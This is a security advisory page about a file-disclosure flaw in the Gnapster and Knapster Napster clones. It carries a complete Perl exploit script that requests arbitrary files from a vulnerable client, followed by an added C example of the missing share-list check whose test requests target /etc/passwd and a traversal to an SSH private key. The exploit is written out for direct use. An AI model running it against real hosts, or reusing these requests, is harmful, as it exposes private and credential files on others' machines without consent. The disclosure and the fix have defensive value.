source: https://www.securityfocus.com/bid/1186/info
Various open source clones of the Napster software package have a vulnerability by which users may view files on a machine running a vulnerable Napster clone client. The file access is limited to files accessible by the user running the client. The official commercial version of Napster does not contain this vulnerability.
#!/usr/bin/perl
########################################################################
# #
# Gnapster / Knapster "view any file" exploit #
# #
# This script was originally written by no_maam on May the 13th 2000 #
# and modified by Dennis ([email protected]) on May the 14th. #
# #
# It exploits a bug in Gnapster prior to 1.3.9 discovered by #
# Jim Early on May the 10th 2000 and a bug in Knapster up to 0.10 #
# discovered by Tom Daniels on May the 10th 2000. #
# Due to a design error in Gnapster and Knapster it's possible to #
# view any file Gnapster / Knapster has access to because the #
# application fails to check that the requested file is an #
# explicitly shared MP3 file before providing it. #
# #
# NOTE: Both clients crashed very often while testing this script! #
# #
# See Bugtraq ID 1186 at http://www.securityfocus.com for details. #
# #
# Standard disclaimer applies. #
# #
########################################################################
use IO::Socket;
unless (@ARGV >= 2) {
    &args;
}
print " .: Gnapster / Knapster \"view any file\" exploit by no_maam and Dennis Conrad :.\n\n";
$host = $ARGV[0];
$file = $ARGV[1];
$file =~ s/\//\\/g;                            # Replace any / in filename with \
if (!defined $ARGV[2] || $ARGV[2] eq "") {     # If no port specified,
    $port = 6699;                              # use port 6699
} else {
    $port = $ARGV[2];
}
if (!defined $ARGV[3] || $ARGV[3] eq "") {     # If no name specified,
    $name = "nobody";                          # use name "nobody"
} else {
    $name = $ARGV[3];
}
$remote = IO::Socket::INET->new( Proto    => "tcp",
                                 PeerAddr => $host,
                                 PeerPort => $port
                               ) || die " Couldn't open port $port on $host\n";
$remote->autoflush(1);
sleep 2;                                       # Wait two seconds (slow connection)
print $remote "GET$name \"$file\" 0\n";        # Get the file
while (<$remote>) {
    if ($_ =~ /FILE NOT FOUND/) {              # Test if file exists
        print " File $file not found or the client has no permission to access it.\n";
        exit 1;                                # Return exit status 1 (for shell scripts)
    }
    if ($_ =~ /NOT SHARED/) {                  # Test for fixed version of Gnapster / Knapster
        print " Sorry, this is a fixed client\n";
        exit 1;
    }
    push @output, $_;                          # Write file to @output
}
print "\n@output\n";                           # Print @output to STDOUT
close $remote;
exit 0;
sub args {
    print " Usage: $0 <host> <file> [port] [name]\n";
    print " By default port 6699 and name \"nobody\" is used.\n";
    exit 1;
}
# EOF
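The check whose absence the header comment describes, seen from the serving client's side. This is an added example, not code from Gnapster, Knapster or the original advisory. The share list, the function check_request, the verdict names and the backslash-to-slash normalisation are assumptions made for illustration; the request form and the NOT SHARED reply are taken from the script above.

```c
#include <stdio.h>
#include <string.h>

/* Constructed share list: the only paths this hypothetical client offers. */
static const char *SHARED[] = {
    "/home/user/mp3/song one.mp3",
    "/home/user/mp3/track2.mp3",
};
#define N_SHARED (sizeof SHARED / sizeof SHARED[0])

enum verdict { SEND_FILE, NOT_SHARED, BAD_REQUEST };

/* Decide whether a request line of the form  nick "filename" offset
 * may be served. On SEND_FILE, `file` holds the normalised path. */
enum verdict check_request(const char *line, char *file, size_t cap)
{
    const char *q1 = strchr(line, '"');
    const char *q2 = q1 ? strrchr(line, '"') : NULL;
    if (!q1 || q2 == q1)
        return BAD_REQUEST;                /* no quoted filename */
    size_t len = (size_t)(q2 - q1 - 1);
    if (len == 0 || len >= cap)
        return BAD_REQUEST;                /* empty or oversized name */
    memcpy(file, q1 + 1, len);
    file[len] = '\0';
    for (char *p = file; *p; p++)          /* assumption: peers send '\' separators */
        if (*p == '\\')
            *p = '/';
    for (size_t i = 0; i < N_SHARED; i++)  /* exact match against the share list */
        if (strcmp(file, SHARED[i]) == 0)
            return SEND_FILE;
    return NOT_SHARED;                     /* readable or not, it was never shared */
}

int main(void)
{
    static const char *names[] = { "SEND_FILE", "NOT SHARED", "BAD REQUEST" };
    const char *reqs[] = {                 /* constructed request lines */
        "nobody \"\\home\\user\\mp3\\track2.mp3\" 0",
        "nobody \"\\etc\\passwd\" 0",
        "nobody \"\\home\\user\\mp3\\..\\.ssh\\id_rsa\" 0",
    };
    char file[256];
    for (size_t i = 0; i < sizeof reqs / sizeof reqs[0]; i++)
        printf("%-12s %s\n", names[check_request(reqs[i], file, sizeof file)], reqs[i]);
    return 0;
}
```

Matching the requested name against the explicit share list, rather than testing only whether the file can be opened, is what makes the request for a non-shared path fail regardless of the permissions of the user running the client.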